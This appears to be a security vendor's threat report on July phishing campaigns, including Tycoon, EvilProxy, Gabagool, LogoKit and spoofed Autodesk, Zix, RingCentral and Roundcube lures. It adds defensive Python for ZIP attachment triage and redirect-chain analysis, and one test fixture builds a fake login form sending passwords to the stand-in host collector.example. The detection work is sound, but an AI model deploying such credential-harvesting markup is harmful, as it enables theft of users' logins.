Notable email-based threats targeting organisations around the world


During July, Barracuda threat analysts identified several notable email-based threats targeting organisations around the world. Many of them leveraged popular phishing-as-a-service (PhaaS) kits. The threats include:

  • Tycoon PhaaS impersonating the Autodesk Construction Cloud for a credential phishing attack
  • A fake toll violation scam targeting U.S.-based drivers
  • Phishing emails mimicking the Zix Secure Message service
  • EvilProxy attacks impersonating RingCentral
  • Gabagool phishing kit exploiting a business productivity tool with toxic PDFs
  • Phishing attacks bundling Copilot and SharePoint brands
  • LogoKit credential theft attacks using Roundcube webmail service
  • Tycoon links distributed as document downloads

Phishing attacks abusing Autodesk Construction Cloud

Threat Snapshot:

Barracuda’s threat analysts have seen attackers abusing the Autodesk Construction Cloud to deliver sophisticated phishing attacks. The Autodesk Construction Cloud is a set of online collaboration tools for people working on construction projects, from design and build to project management and budgeting.

In the attacks seen by Barracuda, attackers impersonate a trusted executive and send official-looking project notifications through Autodesk. The notifications lead recipients to an Autodesk-hosted page containing a seemingly harmless ZIP file.

The ZIP contains an HTML file that initiates the phishing attempt.

Opening the HTML file brings up a fake CAPTCHA verification screen — a common technique in phishing because it lends credibility to the attack and helps it bypass automated security detection. The user is then prompted to enter Microsoft login credentials on a convincingly spoofed page.
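For defenders triaging this delivery pattern, the following added example (not from the Barracuda report) inspects a ZIP attachment for HTML members and reports those carrying a password field that posts to an external host. The sample archive, file names and the `collector.example` host are constructed for illustration.

```python
import io
import zipfile
from html.parser import HTMLParser
from urllib.parse import urlparse

HTML_EXT = (".html", ".htm", ".xhtml", ".shtml")

class FormScan(HTMLParser):
    def __init__(self):
        super().__init__()
        self.password_inputs, self.hosts = 0, set()

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "input" and a.get("type", "").lower() == "password":
            self.password_inputs += 1
        for key in ("action", "src", "href"):
            try:
                host = urlparse(a.get(key, "")).hostname
            except ValueError:       # malformed URL: ignore it, keep scanning
                host = None
            if host:                 # relative links have no host and are skipped
                self.hosts.add(host.lower())

def triage_zip(data: bytes, max_bytes: int = 2_000_000) -> list:
    """Return one finding per HTML member of a ZIP attachment."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir() or not info.filename.lower().endswith(HTML_EXT):
                continue
            if info.file_size > max_bytes:    # do not inflate oversized members
                findings.append({"member": info.filename, "level": "skipped"})
                continue
            scan = FormScan()
            scan.feed(zf.read(info).decode("utf-8", errors="replace"))
            level = "high" if scan.password_inputs and scan.hosts else "medium"
            findings.append({"member": info.filename, "level": level,
                             "password_inputs": scan.password_inputs,
                             "hosts": sorted(scan.hosts)})
    return findings

def build_sample_zip() -> bytes:
    """Constructed sample: a ZIP holding one HTML login form and one text file."""
    page = ('<form action="https://collector.example/submit"><input type="email">'
            '<input type="password" name="p"></form><script src="/c.js"></script>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Project_Update.html", page)
        zf.writestr("notes.txt", "constructed sample")
    return buf.getvalue()
```

Every HTML member is reported at least as "medium", because a page that builds its login form in JavaScript after a CAPTCHA step shows no password field to a static scan.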

Attackers target U.S. road users with new toll scam

Threat Snapshot:

A new phishing scam is targeting U.S.-based drivers with fake notices about unpaid tolls. Victims receive urgent messages via text, email or phone calls, often appearing to come from legitimate toll agencies. These messages claim the recipient owes a fee and threaten account suspension or legal action if payment is not made immediately.

The messages contain links to fake websites that request sensitive data such as license plate numbers and credit card details. Fraudsters then harvest this information for financial gain or identity theft.

Tactics that include urgency and official branding pressure recipients to act without verifying the legitimacy of the message, making this scam highly effective.

Phishing campaign impersonating the Zix Secure Message Centre

Threat Snapshot:

This campaign mimics the Zix Secure Message Centre, an encrypted email service that is popular with organisations in healthcare, finance, legal and government sectors.

Victims receive an email about a supposed secure message, with a link to click to view it. The link takes users to a fake Zix page where they are asked to enter their email. They are then redirected to a fraudulent Microsoft login page designed to steal credentials.

The campaign is effective because it closely replicates Zix’s real workflows and branding, making it hard for recipients to spot the deception. Organisations using email encryption services like Zix and Microsoft 365 are particularly at risk.

EvilProxy fake voicemail attack spoofing RingCentral

Threat Snapshot:

Barracuda’s threat analysts have seen a sophisticated phishing attack using fake voicemail alerts to trick victims into entering their credentials on malicious sites.

Posing as RingCentral, a popular cloud-based business communications and collaboration platform, attackers send convincing emails about a ‘new voicemail,’ complete with personalised details. Clicking the play button initiates a series of redirections — starting with a trusted newsletter platform (Beehiiv), followed by legitimate cloud hosting (Linode), and finally a verification step on glitch.me.

These steps help the attack evade detection and add credibility. The destination is a phishing page using the EvilProxy PhaaS kit, designed to harvest Microsoft credentials, even bypassing common security checks. This multilayered approach makes the attack difficult to spot and highly effective.

In short

Gabagool phishing kit exploits business productivity tool with toxic PDFs

Threat Snapshot:

Gabagool is a sophisticated PhaaS kit known for its stealth and effectiveness and for targeting corporate and government employees with advanced credential-stealing tactics. Barracuda’s threat analysts have spotted attackers using Gabagool and the file-sharing functionality of the Notion.com business productivity tool to distribute malicious PDF files containing phishing links. The PDFs lead to phishing pages designed to steal user credentials. By leveraging a trusted platform and seemingly innocuous PDFs, attackers increase the chances of bypassing standard security controls.

Bundling Copilot and SharePoint brands for phishing

Threat Snapshot:

Cybercriminals are combining Microsoft SharePoint and Copilot branding in phishing schemes, crafting emails that look like genuine ‘Document shared’ alerts from internal or vendor accounts. These messages encourage recipients to click links leading to expertly spoofed Microsoft login pages. The campaign targets organisations that rely on Microsoft tools, aiming to harvest login credentials from unsuspecting employees.

LogoKit supports credential theft using Roundcube webmail service

Threat Snapshot:

This phishing campaign targets users of the Roundcube free open-source webmail client with fake password expiration alerts, warning that their passwords will expire in 48 hours unless action is taken. The message includes a link, supposedly to retain the current password, but it leads to a phishing site built using the LogoKit toolkit. Here, users are prompted to enter their credentials, which are then harvested by attackers.

Tycoon PhaaS link distributed as project document download

Threat Snapshot:

This phishing campaign circulates emails disguised as legitimate business documents, such as ‘Project Overview.pdf.’ Victims are enticed to click on download links, which redirect through several intermediate pages to mask the malicious intent, eventually landing on a Tycoon PhaaS-hosted phishing site. This modular and evasive strategy helps criminals bypass detection and increases the longevity of malicious URLs. The campaign targets business users accustomed to exchanging documents, making them more likely to trust and interact with the phishing links, resulting in stolen credentials and potential business compromise.
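The multi-hop redirection described here and in the RingCentral voicemail campaign above can be surfaced from proxy or sandbox logs. This added example (not from the Barracuda report) rebuilds a chain from logged redirect pairs and flags links that cross several unrelated sites by way of shared publishing platforms. All URLs are constructed; `glitch.me` is the only platform domain taken from the report, and the `.example` entries are stand-ins.

```python
from urllib.parse import urlparse

# Multi-tenant platforms where anyone can publish a page. glitch.me is named in
# the report; the .example entries are constructed stand-ins for the others.
SHARED_SITES = {"glitch.me", "newsletter.example", "cloudhost.example"}

# Constructed sample: (requested URL -> Location header) pairs from a proxy log.
START = "https://link.newsletter.example/c/abc"
SAMPLE_REDIRECTS = {
    START: "https://bucket.cloudhost.example/v/index.html",
    "https://bucket.cloudhost.example/v/index.html":
        "https://constructed-sample.glitch.me/",
    "https://constructed-sample.glitch.me/":
        "https://login.portal-check.example/auth",
}

def site(url: str) -> str:
    """Approximate registrable domain: last two labels (no public-suffix list)."""
    host = (urlparse(url).hostname or "").lower()
    return ".".join(host.split(".")[-2:])

def follow(start: str, redirects: dict, max_hops: int = 10) -> list:
    """Rebuild the hop sequence from logged redirect pairs."""
    chain, seen = [start], {start}
    while chain[-1] in redirects and len(chain) <= max_hops:
        nxt = redirects[chain[-1]]
        if nxt in seen:              # redirect loop: stop instead of spinning
            break
        chain.append(nxt)
        seen.add(nxt)
    return chain

def assess(chain: list) -> dict:
    """Summarise a chain and flag the multi-platform pattern."""
    sites = [site(u) for u in chain]
    distinct = list(dict.fromkeys(sites))            # order-preserving dedupe
    shared = [s for s in sites[:-1] if s in SHARED_SITES]
    flag = len(distinct) >= 3 and len(shared) >= 2 and sites[0] != sites[-1]
    return {"hops": len(chain) - 1, "sites": distinct,
            "shared_platform_hops": len(shared), "flag": flag}
```

The thresholds are assumptions to tune against local traffic, since marketing and link-tracking services also produce legitimate multi-hop chains.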
